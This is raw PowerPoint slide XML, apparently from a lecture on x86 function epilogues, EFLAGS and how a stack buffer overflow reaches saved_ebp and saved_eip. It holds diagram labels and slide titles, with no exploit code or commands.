          <p:cNvPr id="1112092" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1112081" idx="1"/>
            <a:endCxn id="1112073" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="4143375"/>
            <a:ext cx="1588" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112093" name="Rectangle 29"/>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12095" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141068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20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20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20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20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20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20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20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20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1120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120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120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120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120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120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120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120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12086"/>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111209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1209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1209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1208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1208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1209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120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12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6" grpId="0"/>
      <p:bldP spid="1112067" grpId="0"/>
      <p:bldP spid="1112068" grpId="0"/>
      <p:bldP spid="1112069" grpId="0" animBg="1"/>
      <p:bldP spid="1112069" grpId="1" animBg="1"/>
      <p:bldP spid="1112070" grpId="0" animBg="1"/>
      <p:bldP spid="1112071" grpId="0" animBg="1"/>
      <p:bldP spid="1112072" grpId="0" animBg="1"/>
      <p:bldP spid="1112073" grpId="0" animBg="1"/>
      <p:bldP spid="1112078" grpId="0" animBg="1"/>
      <p:bldP spid="1112079" grpId="0" animBg="1"/>
      <p:bldP spid="1112080" grpId="0" animBg="1"/>
      <p:bldP spid="1112081" grpId="0" animBg="1"/>
      <p:bldP spid="1112082" grpId="0" animBg="1"/>
      <p:bldP spid="1112083" grpId="0" animBg="1"/>
      <p:bldP spid="1112084" grpId="0" animBg="1"/>
      <p:bldP spid="1112085" grpId="0" animBg="1"/>
      <p:bldP spid="1112086" grpId="0" animBg="1"/>
      <p:bldP spid="1112087" grpId="0"/>
      <p:bldP spid="1112088" grpId="0"/>
      <p:bldP spid="1112093" grpId="0" animBg="1"/>
      <p:bldP spid="1112093" grpId="1" animBg="1"/>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8" name="Rectangle 6"/>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14119" name="Rectangle 7"/>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Buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114120" name="Rectangle 8"/>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Buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114121" name="Rectangle 9"/>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Buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114122" name="Rectangle 10"/>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1"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1114124" name="Oval 12"/>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4125" name="Oval 13"/>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4126" name="Oval 14"/>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14127" name="Rectangle 15"/>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14128" name="Rectangle 16"/>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14129" name="Rectangle 17"/>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14130" name="Rectangle 18"/>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14131" name="Rectangle 19"/>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14132" name="Rectangle 20"/>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14133" name="AutoShape 21"/>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4134" name="AutoShape 22"/>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4135" name="Rectangle 23"/>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saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114136" name="Text Box 24"/>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14137" name="Text Box 25"/>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14138" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1114132" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2606676" y="4557921"/>
            <a:ext cx="3870324" cy="1185654"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1114139" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1114131" idx="1"/>
            <a:endCxn id="1114135" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -57500005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1114140" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1114130" idx="1"/>
            <a:endCxn id="1114135" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32300005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114141" name="Rectangle 29"/>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14142" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2686050"/>
            <a:ext cx="2057400" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="64000"/>
            </a:schemeClr>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14144"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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34"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5"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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151350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4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5"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16166"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Buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116167"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Buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116168"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Buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116169"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16171"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6172"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6173"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16174"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16175"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16176"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16177"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16178"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16179"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16180"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6181"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6182"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saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116183"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16184"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16185" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1116179" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2590800" y="4931599"/>
            <a:ext cx="3886200" cy="811976"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1116186" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1116178" idx="1"/>
            <a:endCxn id="1116175" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1343025"/>
            <a:ext cx="1588" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70100005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1116187" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1116177" idx="1"/>
            <a:endCxn id="1116174" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2257425"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -38600005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116188"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16189" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2686050"/>
            <a:ext cx="2057400" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="64000"/>
            </a:schemeClr>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6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37"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8"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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39"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33"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202210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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>EFLAGS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032196" name="Picture 4" descr="eflag"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2047205" y="1920480"/>
            <a:ext cx="4926428" cy="3838953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179244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3"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18214"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Buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118215"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Buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118216"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Buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118217"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18219"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8220"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8221"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18222"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18223"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18224"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18225"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18226"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18227"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18228"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8229"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8230"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saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118231"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18232"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18233" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1118227" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2895600" y="5429251"/>
            <a:ext cx="3581400" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1118234" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1118226" idx="1"/>
            <a:endCxn id="1118223" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1343025"/>
            <a:ext cx="1588" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70100005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1118235" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1118225" idx="1"/>
            <a:endCxn id="1118224" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1800225"/>
            <a:ext cx="1588" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39500005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118236"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18237" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="5257800"/>
            <a:ext cx="2209800" cy="584776"/>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a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>main: return 0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118238" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2686050"/>
            <a:ext cx="2057400" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="64000"/>
            </a:schemeClr>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36"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7"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8"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5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34"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80400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8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9" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="23431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20260" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="36576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20261" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="39433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buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120262" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="42291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buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120263" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="4972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buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120264" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="5257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9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3898900" y="4591050"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1120266" name="Oval 10"/>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0267" name="Oval 11"/>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0268" name="Oval 12"/>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20269" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="33718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20270" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="24574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20271" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="27432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20272" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="24574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0273" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="33718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0274" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894661" y="28037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20275" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894661" y="42896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sp>
        <p:nvSpPr>
          <p:cNvPr id="1120276" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="36576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20277" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4876800" y="3371850"/>
            <a:ext cx="1143000" cy="40005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sz="1600">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120278" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3143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buffer[256]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120279" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overflown Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>efore Returning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2081856633"/>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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tracking The Frame Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1122307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
